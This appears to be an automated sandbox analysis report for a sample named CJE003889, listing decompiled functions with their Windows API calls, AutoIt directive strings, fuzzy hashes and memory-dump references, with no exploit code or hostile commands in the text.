Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: d8bf2d65dddb6242a1e0a7dd668dd2e7b088dae124e6e315eceafaa7aefe06a3
Instruction ID: 088fed51f3f3d1281b6dc39df9437b3a0401ddcdd4cd548999713633806ac2f2
Opcode Fuzzy Hash: d8bf2d65dddb6242a1e0a7dd668dd2e7b088dae124e6e315eceafaa7aefe06a3
Instruction Fuzzy Hash: 98412A75A44289EFDB20DF51D884EAABBF4FB04314F14962AFD159B260D730AE50DF60

Function 00CE0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CE0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE0FFE
FreeLibrary.KERNEL32(00000000), ref: 00CE10B5

Part of subcall function 00CE0FA5: RegCloseKey.ADVAPI32(?), ref: 00CE101B
Part of subcall function 00CE0FA5: FreeLibrary.KERNEL32(?), ref: 00CE106D
Part of subcall function 00CE0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CE1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00CE1058

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 957d96d6a62898989109ccd3ac94335438c977e7045854b1da7fc9ba48e7e862
Instruction ID: 1e51fdca3281ff7fa3aef9ef1e5ee7a8ad55bf95e5b7bd153a3d72eb149450fe
Opcode Fuzzy Hash: 957d96d6a62898989109ccd3ac94335438c977e7045854b1da7fc9ba48e7e862
Instruction Fuzzy Hash: 33314B71900149BFEB14DF91DC89EFFB7BCEF08310F04016AE912A2141EB709F969AA0

Function 00CE62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CE62EC
GetWindowLongW.USER32(00F96388,000000F0), ref: 00CE631F
GetWindowLongW.USER32(00F96388,000000F0), ref: 00CE6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CE6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CE63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00CE63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CE63DB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4eadc4b18268f8b3ec54b4dd86327c6f41644de77c4bbe9b420a12dc39f4bda5
Instruction ID: 266d1371e1478e262a70384ada103481043ed676dcb73e243b3ff19afa557f1c
Opcode Fuzzy Hash: 4eadc4b18268f8b3ec54b4dd86327c6f41644de77c4bbe9b420a12dc39f4bda5
Instruction Fuzzy Hash: AF313430650280AFDB21CF1AEC84F5837E5FB6A754F1801A8F521CF2B2CB71AD419B51

Function 00CBDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDB54
SysAllocString.OLEAUT32(00000000), ref: 00CBDB57
SysAllocString.OLEAUT32(?), ref: 00CBDB75
SysFreeString.OLEAUT32(?), ref: 00CBDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00CBDBA3
SysAllocString.OLEAUT32(?), ref: 00CBDBB1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b78389d4641aa7ab969b635774d90e4c7021e073b4dbc93e16dd0de18c9b83ed
Instruction ID: c239dd9087ef0646ee5d66791d5967f21f3c6fe4117f222e4c95815c13af515d
Opcode Fuzzy Hash: b78389d4641aa7ab969b635774d90e4c7021e073b4dbc93e16dd0de18c9b83ed
Instruction Fuzzy Hash: 0C219536600219AFDF10DFA9DC84DFF73ACEB09360F118569F915DB290E6709D458764

Function 00CD6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CD7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CD61C6
WSAGetLastError.WSOCK32(00000000), ref: 00CD61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CD620E
connect.WSOCK32(00000000,?,00000010), ref: 00CD6217
WSAGetLastError.WSOCK32 ref: 00CD6221
closesocket.WSOCK32(00000000), ref: 00CD624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CD6263

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4d73668b653b50fd6c45b96400a6a44d2b3846397b7b9bfdf4d17a59c75d5643
Instruction ID: 1d84f4c0ea55c9c3edd332512bc34c5cf817dc6f9582738ed0c89548340eef52
Opcode Fuzzy Hash: 4d73668b653b50fd6c45b96400a6a44d2b3846397b7b9bfdf4d17a59c75d5643
Instruction Fuzzy Hash: D331A171600118AFEF20AF64CC85BBE77ADEB45710F04402AFE15AB291DB74AD05DBA1

Function 00CBF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00CBF671
__wcsnicmp.LIBCMT ref: 00CBF692
__wcsnicmp.LIBCMT ref: 00CBF6AC

Strings

#OnAutoItStartRegister, xrefs: 00CBF6A6
#notrayicon, xrefs: 00CBF669
#requireadmin, xrefs: 00CBF68C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 01a4e70c7942139d6f64836197326703f39b865afc1411be487547ed01310b46
Instruction ID: b242fd6e808b085354000632f154b1c51608a49bfe6b6c17cbf6b38ca2104189
Opcode Fuzzy Hash: 01a4e70c7942139d6f64836197326703f39b865afc1411be487547ed01310b46
Instruction Fuzzy Hash: 7F21467220511566D231FA35AC02FF773E8EF55744F10403EF99696291EF509E43E399

Function 00CBDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDC2F
SysAllocString.OLEAUT32(00000000), ref: 00CBDC32
SysAllocString.OLEAUT32 ref: 00CBDC53
SysFreeString.OLEAUT32 ref: 00CBDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00CBDC76
SysAllocString.OLEAUT32(?), ref: 00CBDC84

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bd71e5978841176f3242f636fa48cf38ec04d9afedc00f3f6845a7a02aeb7c9b
Instruction ID: a5de62502188f374cf8ce1c93e978848db0518d59156c932399a65ef2ba45c55
Opcode Fuzzy Hash: bd71e5978841176f3242f636fa48cf38ec04d9afedc00f3f6845a7a02aeb7c9b
Instruction Fuzzy Hash: F2214435604245AF9B10EFA8DC88EFB77ECEB09360F108129F915CB2A1E674DD81CB64

Function 00CE75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CE7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CE763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CE764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CE7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CE7665

Strings

Msctls_Progress32, xrefs: 00CE7603

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 744bd3a8af563b877536d980205230fdb1b302635583180d1296e78f219851e9
Instruction ID: 14ba5075cc05896862f86b5dbda1cb5a72dccf58e5317107803e9c6eea4e93ab
Opcode Fuzzy Hash: 744bd3a8af563b877536d980205230fdb1b302635583180d1296e78f219851e9
Instruction Fuzzy Hash: 5711B2B2150259BFEF118F65CC85EEB7F6DEF08798F014214FA04A60A0CB729C21DBA4

Function 00C8406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C83F85), ref: 00C84085
GetProcAddress.KERNEL32(00000000), ref: 00C8408C
EncodePointer.KERNEL32(00000000), ref: 00C84097
DecodePointer.KERNEL32(00C83F85), ref: 00C840B2

Strings

combase.dll, xrefs: 00C84080
RoUninitialize, xrefs: 00C84074

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 55a2b2a8d31c7c280a5fcb319f3c28dd25172459b69e038036375ad83c3292e7
Instruction ID: da0e20723c9eeaf1c87436077249a54c31a6fb39e51e83bf25574b6668e6ded0
Opcode Fuzzy Hash: 55a2b2a8d31c7c280a5fcb319f3c28dd25172459b69e038036375ad83c3292e7
Instruction Fuzzy Hash: F5E08C70681300EFEB31AF60EC4DB0A3AA4B724742F00403CF621E92B0CBBB4212CB25

Function 00CC64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CC660B
_memmove.LIBCMT ref: 00CC6546

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

_memmove.LIBCMT ref: 00CC65B9
_memmove.LIBCMT ref: 00CC66A0
_memmove.LIBCMT ref: 00CC66B9
_memmove.LIBCMT ref: 00CC66D5

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3c037621285d4c4bc268f6a5655e9fe130a60969c43cc08e6de04250ccfb155e
Instruction ID: e749db556f13c9d5a93fed119dfd7c3d657ce4bd2f8fcbe5d5127707ff6e7fe9
Opcode Fuzzy Hash: 3c037621285d4c4bc268f6a5655e9fe130a60969c43cc08e6de04250ccfb155e
Instruction Fuzzy Hash: 09616A3090065A9BCF11EF64CD82FFE37A9EF09308F044919F9556B292DB35E905EB54

Function 00CE01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CE0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CE0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CE038C
RegCloseKey.ADVAPI32(00000000), ref: 00CE0399

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: b5aec4ce7fedb6a52a656d1bf1215914b6505bdd939549cf182828de94395b2d
Instruction ID: bf413758b2bfcdfe0d83a15516601d06e8b850e0da802d6ace674cb16a579c91
Opcode Fuzzy Hash: b5aec4ce7fedb6a52a656d1bf1215914b6505bdd939549cf182828de94395b2d
Instruction Fuzzy Hash: 05516A31208240AFC714EF65C885E6FBBE8FF84314F14492DF5958B2A2DB71E949DB92

Function 00CE5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00CE57FB
GetMenuItemCount.USER32(00000000), ref: 00CE5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CE585A
GetMenuItemID.USER32(?,?), ref: 00CE58C9
GetSubMenu.USER32(?,?), ref: 00CE58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00CE5928

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: d1127aebed41114d53cd99cb8c53d345d536503287220e459e5b86fe9ce5d713
Instruction ID: 21c623cf760f48b93200f8bd09b2d93e99d21ce01cba21b65d5f1380bd778adf
Opcode Fuzzy Hash: d1127aebed41114d53cd99cb8c53d345d536503287220e459e5b86fe9ce5d713
Instruction Fuzzy Hash: CD516F75E00655EFCF21EF65C885AAEB7B4EF48324F104069E851BB391CB70AE41DB90

Function 00CBEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CBEF06
VariantClear.OLEAUT32(00000013), ref: 00CBEF78
VariantClear.OLEAUT32(00000000), ref: 00CBEFD3
_memmove.LIBCMT ref: 00CBEFFD
VariantClear.OLEAUT32(?), ref: 00CBF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CBF078

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 8c5cc4569ed17a414c05a63aa6d58db65b907211d1136082ce1aef2412696903
Instruction ID: c437bb7b12aa274214bdd3599fa3dca97da57f3e1dbb58d01dd701fe2b205034
Opcode Fuzzy Hash: 8c5cc4569ed17a414c05a63aa6d58db65b907211d1136082ce1aef2412696903
Instruction Fuzzy Hash: 1F5168B5A00209EFCB10DF58D884AAAB7B8FF4C314F15856DE959DB351E330E912CBA0

Function 00CC220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC22A3
IsMenu.USER32(00000000), ref: 00CC22C3
CreatePopupMenu.USER32 ref: 00CC22F7
GetMenuItemCount.USER32(000000FF), ref: 00CC2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CC2386

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 444d6d513ed7e2e64830d8ca979f1336877d248bea704c9e7967a065c6bcbedf
Instruction ID: ecfaf75607a46206e25cc6ad8f2353bcc65ebfe4451dad64431f49a916d8603e
Opcode Fuzzy Hash: 444d6d513ed7e2e64830d8ca979f1336877d248bea704c9e7967a065c6bcbedf
Instruction Fuzzy Hash: ED51AE70601289DBDF21CF68C988FAEBBF9AF45314F18412DE861AB2A0D3749A45CB51

Function 00C61765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00C6179A
GetWindowRect.USER32(?,?), ref: 00C617FE
ScreenToClient.USER32(?,?), ref: 00C6181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C6182C
EndPaint.USER32(?,?), ref: 00C61876

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 15109219b52293441afc4557ff538dc5ecfddc1a6e14afbbc282c65a2e52a9e3
Instruction ID: ebbc83cd4f194e486b5eae364968fdcd30df64d4dc9fe531273111676e65d695
Opcode Fuzzy Hash: 15109219b52293441afc4557ff538dc5ecfddc1a6e14afbbc282c65a2e52a9e3
Instruction Fuzzy Hash: 17418C30104740AFDB20DF25DCC8FBA7BE8EB59725F084668F9A5CB2A1C7709946DB61

Function 00CEB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00D257B0,00000000,00F96388,?,?,00D257B0,?,00CEB5A8,?,?), ref: 00CEB712
EnableWindow.USER32(00000000,00000000), ref: 00CEB736
ShowWindow.USER32(00D257B0,00000000,00F96388,?,?,00D257B0,?,00CEB5A8,?,?), ref: 00CEB796
ShowWindow.USER32(00000000,00000004,?,00CEB5A8,?,?), ref: 00CEB7A8
EnableWindow.USER32(00000000,00000001), ref: 00CEB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CEB7EF

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: dc966534e7223a25f52ca45f181970d91df6288420bd2685f64cf10d19955b5d
Instruction ID: b6d41c95f405e61adc3f2cc86c81bbf3d7b5d17b1b0d0cd09601b5be6c92a31e
Opcode Fuzzy Hash: dc966534e7223a25f52ca45f181970d91df6288420bd2685f64cf10d19955b5d
Instruction Fuzzy Hash: 73419434600280EFDB26CF25C499BA67BE1FF45310F1841B9F9588FAA2C731AD56CB61

Function 00CD709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00CD4E41,?,?,00000000,00000001), ref: 00CD70AC

Part of subcall function 00CD39A0: GetWindowRect.USER32(?,?), ref: 00CD39B3

GetDesktopWindow.USER32 ref: 00CD70D6
GetWindowRect.USER32(00000000), ref: 00CD70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CD710F

Part of subcall function 00CC5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CC52BC

GetCursorPos.USER32(?), ref: 00CD713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CD7199

Memory Dump Source

